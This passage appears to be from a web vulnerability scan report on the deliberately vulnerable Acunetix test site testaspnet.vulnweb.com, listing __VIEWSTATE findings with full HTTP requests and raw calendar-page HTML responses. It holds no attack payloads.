style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8197&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAA9VM9S9oIZGRkomtQ6tii7W0i7e3Kz%2BoqwFWfsa0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK0teekDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2Be3t9bY6RruB%2F2jm8bJ9AB2rJ0bA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:16 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAA9VM9S9oIZGRkomtQ6tii7W0i7e3Kz+oqwFWfsa0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK0teekDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+e3t9bY6RruB/2jm8bJ9AB2rJ0bA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:White" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8185&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAAFfPQdoIZGRkwVDgdGLxOEYNHEngvRRBMe0MniE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BvpByArrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD6Ci7lETR9GRe3qRlzzbcO1Vhed4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:38 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAAFfPQdoIZGRkwVDgdGLxOEYNHEngvRRBMe0MniE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+vpByArrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD6Ci7lETR9GRe3qRlzzbcO1Vhed4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:White" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" 